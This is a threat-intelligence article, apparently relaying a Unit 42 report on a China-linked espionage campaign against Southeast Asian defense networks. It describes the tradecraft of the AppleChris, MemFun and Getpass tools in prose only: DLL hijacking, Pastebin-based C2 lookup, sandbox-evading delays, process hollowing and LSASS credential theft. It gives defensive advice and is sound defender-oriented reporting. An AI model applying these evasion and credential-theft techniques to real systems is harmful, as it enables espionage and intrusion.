Government agencies and military organizations across Southeast Asia have become the focus of a long-running, highly targeted cyber espionage campaign that has likely been active since at least 2020. According to threat intelligence from Palo Alto Networks Unit 42, the activity cluster, tracked as CL‑STA‑1087 (where “STA” denotes state-aligned), is assessed to be linked to interests in China and is primarily aimed at gathering sensitive military intelligence.
Targeted cyber espionage against defense and government networks
Unit 42 analysts observe that CL‑STA‑1087 exhibits behavior typical of advanced persistent threat (APT) operations: strict operational discipline, a strong focus on stealth, and the ability to maintain access to victim environments for extended periods. Rather than indiscriminately exfiltrating all accessible data, the operators concentrate on high-value military and strategic information.
The group’s collection priorities include documents describing military capabilities, command structures, and cooperation with Western armed forces. Of particular interest are materials related to C4I systems (Command, Control, Communications, Computers & Intelligence) — the digital backbone that underpins modern command-and-control, secure communications, and battlefield awareness.
Public threat reports from organizations such as Verizon and Mandiant consistently show that defense and public sector entities are among the most frequently targeted by nation-state actors. CL‑STA‑1087 fits this pattern, demonstrating a shift from one-off, noisy intrusions to quiet, sustained espionage designed to yield long-term strategic advantage.
Advanced toolset: AppleChris, MemFun and Getpass malware
AppleChris backdoor: DLL hijacking and Pastebin-based C2 discovery
One of the primary tools in this campaign is the AppleChris backdoor. It is deployed using DLL hijacking, a technique in which a malicious dynamic link library (DLL) is placed where a legitimate application will unknowingly load it. This allows the malware to execute within a trusted process, significantly complicating detection.
AppleChris employs a dead drop resolver strategy to locate its command-and-control (C2) servers. Instead of contacting a hard-coded C2 address, it retrieves Base64-encoded data from Pastebin, which contains the current C2 endpoint. Some variants also query Dropbox for the same information, using Pastebin as a fallback channel. Public posts used in this mechanism date back to at least September 2020, indicating a durable and well-maintained infrastructure.
Once connected, AppleChris provides full remote administration capabilities, including file system browsing, file upload/download, data deletion, process execution, and remote command shell access. Newer versions add enhanced network proxying features, allowing attackers to tunnel traffic and mask their operations through compromised hosts.
To evade automated analysis and sandboxing, some AppleChris samples implement execution delays, sleeping for up to 30 seconds in EXE form and up to 120 seconds for DLLs. Because many sandboxes observe behavior only for a short window, such delays can allow the malware to remain undetected during initial scans.
MemFun: modular in-memory backdoor platform
The second major component of CL‑STA‑1087’s arsenal is MemFun, a more flexible and modular platform than AppleChris. MemFun uses a multi-stage loading chain: an initial loader injects shellcode, which then runs in memory, retrieves C2 configuration from Pastebin, establishes a connection, and downloads a DLL module that acts as the main backdoor.
Because the primary DLL is loaded dynamically at runtime, attackers can change or upgrade payloads without modifying the initial loader, effectively turning MemFun into a generic delivery framework. This approach hinders static analysis and weakens traditional signature-based detection.
MemFun also incorporates anti-forensic techniques. Its dropper aligns its file timestamp with the creation date of the Windows system directory to blend into the environment. It then uses process hollowing against the legitimate dllhost.exe process, replacing its memory with malicious code while retaining the original process name and metadata. This memory-resident execution leaves minimal traces on disk and makes investigation more difficult.
Getpass: credential theft for lateral movement
To expand their foothold and escalate privileges, the attackers deploy Getpass, a customized variant of the well-known credential theft tool Mimikatz. Getpass extracts plaintext passwords, NTLM hashes, and other authentication artifacts directly from the memory of the Windows lsass.exe process.
Without adequate protection of LSASS (such as virtualization-based isolation or strict access controls), this technique enables rapid compromise of privileged accounts and supports extensive lateral movement across sensitive government and defense networks.
Tactics: stealthy PowerShell, “sleeping” sessions and lateral movement
The CL‑STA‑1087 operation came to light after defenders detected a suspicious PowerShell invocation that slept for six hours before initiating a reverse shell to a C2 server. This behavior illustrates the group’s focus on operational patience: delaying activity to avoid triggering monitoring tools that focus on newly started processes.
While the initial access vector has not been conclusively identified, post-compromise activity is well-defined. The operators deploy various versions of AppleChris across multiple hosts to establish redundancy and conduct lateral movement. File searches on infected systems reveal an emphasis on official meeting records, joint exercises, readiness assessments, and analytical reports on cooperation with Western militaries.
Impact on C4I security and practical defense measures
For Southeast Asian defense and government organizations, CL‑STA‑1087 underscores the strategic importance of securing C4I systems and adjacent IT infrastructure. Unauthorized access to plans for exercises, command hierarchies, and allied cooperation can directly affect national security and regional stability.
Effective countermeasures should prioritize hardening administrative tools such as PowerShell (e.g., AppLocker policies, Constrained Language Mode), deploying endpoint detection and response (EDR) solutions with behavioral analytics, and monitoring unusual access to public paste services and cloud storage platforms like Pastebin and Dropbox that may be used for C2 discovery.
Defenders should also strengthen credential protection by enabling technologies such as Credential Guard, isolating LSASS secrets, and restricting access to sensitive processes. Regular penetration testing and red-team exercises modeled on APT techniques, network segmentation, enforcement of least-privilege access, and continuous monitoring of anomalous access to sensitive military documents are critical to reducing exposure.
CL‑STA‑1087 highlights that modern cyber espionage is often a slow, methodical, and deliberately low-profile effort to embed within critical networks over months or years. Organizations in the defense and public sectors should assume persistent interest from state-aligned actors and adjust their monitoring, incident response, and staff training accordingly. Proactively building resilience against APT tradecraft today greatly increases the likelihood of detecting and disrupting similar long-term operations before they can erode strategic and operational advantage.
